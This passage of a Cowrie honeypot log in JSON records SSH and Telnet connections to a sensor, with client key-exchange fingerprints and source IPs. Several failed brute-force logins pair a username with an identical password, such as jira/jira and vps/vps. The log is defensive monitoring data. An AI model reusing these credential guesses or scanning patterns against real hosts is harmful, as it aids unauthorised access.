fie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T17:50:47.663975Z","src_ip":"170.64.157.139","session":"82d901a0c25a"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-09-08T17:50:49.044359Z","src_ip":"170.64.157.139","session":"82d901a0c25a"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:50:50.374057Z","src_ip":"170.64.157.139","session":"82d901a0c25a"}
{"eventid":"cowrie.session.connect","src_ip":"185.156.73.235","src_port":64001,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffe173e0711e","protocol":"ssh","message":"New connection: 185.156.73.235:64001 (1.2.3.4:22) [session: ffe173e0711e]","sensor":"my-vps","timestamp":"2025-09-08T17:50:50.490802Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:50:50.512420Z","src_ip":"185.156.73.235","session":"ffe173e0711e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53970,"dst_ip":"1.2.3.4","dst_port":22,"session":"07ab59057f93","protocol":"ssh","message":"New connection: 212.227.125.160:53970 (1.2.3.4:22) [session: 07ab59057f93]","sensor":"my-vps","timestamp":"2025-09-08T17:51:00.821401Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:51:00.883519Z","src_ip":"212.227.125.160","session":"07ab59057f93"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":45882,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa1078206463","protocol":"ssh","message":"New connection: 170.64.157.139:45882 (1.2.3.4:22) [session: aa1078206463]","sensor":"my-vps","timestamp":"2025-09-08T17:52:06.216909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:52:06.217668Z","src_ip":"170.64.157.139","session":"aa1078206463"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T17:52:06.517248Z","src_ip":"170.64.157.139","session":"aa1078206463"}
{"eventid":"cowrie.login.failed","username":"wpyan","password":"wpyan","message":"login attempt [wpyan/wpyan] failed","sensor":"my-vps","timestamp":"2025-09-08T17:52:07.389524Z","src_ip":"170.64.157.139","session":"aa1078206463"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:52:08.646421Z","src_ip":"170.64.157.139","session":"aa1078206463"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":39846,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c63943158a3","protocol":"ssh","message":"New connection: 170.64.157.139:39846 (1.2.3.4:22) [session: 3c63943158a3]","sensor":"my-vps","timestamp":"2025-09-08T17:53:20.777341Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:53:20.778118Z","src_ip":"170.64.157.139","session":"3c63943158a3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T17:53:21.068879Z","src_ip":"170.64.157.139","session":"3c63943158a3"}
{"eventid":"cowrie.login.failed","username":"jira","password":"jira","message":"login attempt [jira/jira] failed","sensor":"my-vps","timestamp":"2025-09-08T17:53:21.943520Z","src_ip":"170.64.157.139","session":"3c63943158a3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:53:23.237618Z","src_ip":"170.64.157.139","session":"3c63943158a3"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":40348,"dst_ip":"1.2.3.4","dst_port":22,"session":"8807e19baadf","protocol":"ssh","message":"New connection: 170.64.157.139:40348 (1.2.3.4:22) [session: 8807e19baadf]","sensor":"my-vps","timestamp":"2025-09-08T17:54:33.237499Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:54:33.239006Z","src_ip":"170.64.157.139","session":"8807e19baadf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T17:54:33.527976Z","src_ip":"170.64.157.139","session":"8807e19baadf"}
{"eventid":"cowrie.login.failed","username":"vps","password":"vps","message":"login attempt [vps/vps] failed","sensor":"my-vps","timestamp":"2025-09-08T17:54:34.397229Z","src_ip":"170.64.157.139","session":"8807e19baadf"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:54:35.688524Z","src_ip":"170.64.157.139","session":"8807e19baadf"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":42256,"dst_ip":"1.2.3.4","dst_port":22,"session":"658ce38d3a06","protocol":"ssh","message":"New connection: 170.64.157.139:42256 (1.2.3.4:22) [session: 658ce38d3a06]","sensor":"my-vps","timestamp":"2025-09-08T17:55:45.556671Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:55:45.557590Z","src_ip":"170.64.157.139","session":"658ce38d3a06"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T17:55:45.884467Z","src_ip":"170.64.157.139","session":"658ce38d3a06"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp","message":"login attempt [uftp/uftp] failed","sensor":"my-vps","timestamp":"2025-09-08T17:55:46.782454Z","src_ip":"170.64.157.139","session":"658ce38d3a06"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:55:48.076812Z","src_ip":"170.64.157.139","session":"658ce38d3a06"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63182,"dst_ip":"1.2.3.4","dst_port":22,"session":"85e95f85bd19","protocol":"ssh","message":"New connection: 217.72.205.35:63182 (1.2.3.4:22) [session: 85e95f85bd19]","sensor":"my-vps","timestamp":"2025-09-08T17:56:23.044833Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:56:23.047542Z","src_ip":"217.72.205.35","session":"85e95f85bd19"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":36832,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ae12601436d","protocol":"ssh","message":"New connection: 170.64.157.139:36832 (1.2.3.4:22) [session: 9ae12601436d]","sensor":"my-vps","timestamp":"2025-09-08T17:57:00.395373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:57:00.396303Z","src_ip":"170.64.157.139","session":"9ae12601436d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T17:57:00.694956Z","src_ip":"170.64.157.139","session":"9ae12601436d"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"testuser","message":"login attempt [testuser/testuser] failed","sensor":"my-vps","timestamp":"2025-09-08T17:57:01.589121Z","src_ip":"170.64.157.139","session":"9ae12601436d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:57:02.888931Z","src_ip":"170.64.157.139","session":"9ae12601436d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51824,"dst_ip":"1.2.3.4","dst_port":23,"session":"4954ba765fbc","protocol":"telnet","message":"New connection: 212.227.235.229:51824 (1.2.3.4:23) [session: 4954ba765fbc]","sensor":"my-vps","timestamp":"2025-09-08T17:57:34.743430Z"}
{"eventid":"cowrie.session.closed","duration":13.048315525054932,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:57:47.791645Z","src_ip":"212.227.235.229","session":"4954ba765fbc"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":38444,"dst_ip":"1.2.3.4","dst_port":22,"session":"e55fee18b8c2","protocol":"ssh","message":"New connection: 170.64.157.139:38444 (1.2.3.4:22) [session: e55fee18b8c2]","sensor":"my-vps","timestamp":"2025-09-08T17:58:14.814760Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:58:14.815504Z","src_ip":"170.64.157.139","session":"e55fee18b8c2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T17:58:15.080812Z","src_ip":"170.64.157.139","session":"e55fee18b8c2"}
{"eventid":"cowrie.login.failed","username":"zhouh","password":"zhouh","message":"login attempt [zhouh/zhouh] failed","sensor":"my-vps","timestamp":"2025-09-08T17:58:15.868261Z","src_ip":"170.64.157.139","session":"e55fee18b8c2"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:58:17.131592Z","src_ip":"170.64.157.139","session":"e55fee18b8c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60339,"dst_ip":"1.2.3.4","dst_port":23,"session":"baad7c6e6a82","protocol":"telnet","message":"New connection: 212.227.125.160:60339 (1.2.3.4:23) [session: baad7c6e6a82]","sensor":"my-vps","timestamp":"2025-09-08T17:59:21.771440Z"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":36330,"dst_ip":"1.2.3.4","dst_port":22,"session":"b048d314ef8f","protocol":"ssh","message":"New connection: 170.64.157.139:36330 (1.2.3.4:22) [session: b048d314ef8f]","sensor":"my-vps","timestamp":"2025-09-08T17:59:30.202833Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:59:30.203566Z","src_ip":"170.64.157.139","session":"b048d314ef8f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T17:59:30.613467Z","src_ip":"170.64.157.139","session":"b048d314ef8f"}
{"eventid":"cowrie.login.failed","username":"pul","password":"pul","message":"login attempt [pul/pul] failed","sensor":"my-vps","timestamp":"2025-09-08T17:59:31.608933Z","src_ip":"170.64.157.139","session":"b048d314ef8f"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:59:32.938172Z","src_ip":"170.64.157.139","session":"b048d314ef8f"}
{"eventid":"cowrie.session.closed","duration":13.9711172580719,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:59:35.742464Z","src_ip":"212.227.125.160","session":"baad7c6e6a82"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":59512,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad29e0c5d3a9","protocol":"ssh","message":"New connection: 170.64.157.139:59512 (1.2.3.4:22) [session: ad29e0c5d3a9]","sensor":"my-vps","timestamp":"2025-09-08T18:00:43.767306Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:00:43.768054Z","src_ip":"170.64.157.139","session":"ad29e0c5d3a9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:00:44.099678Z","src_ip":"170.64.157.139","session":"ad29e0c5d3a9"}
{"eventid":"cowrie.login.failed","username":"yuanwd","password":"yuanwd","message":"login attempt [yuanwd/yuanwd] failed","sensor":"my-vps","timestamp":"2025-09-08T18:00:45.166591Z","src_ip":"170.64.157.139","session":"ad29e0c5d3a9"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:00:46.494827Z","src_ip":"170.64.157.139","session":"ad29e0c5d3a9"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":51538,"dst_ip":"1.2.3.4","dst_port":22,"session":"4107ddf9c7de","protocol":"ssh","message":"New connection: 170.64.157.139:51538 (1.2.3.4:22) [session: 4107ddf9c7de]","sensor":"my-vps","timestamp":"2025-09-08T18:01:59.316861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:01:59.317619Z","src_ip":"170.64.157.139","session":"4107ddf9c7de"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa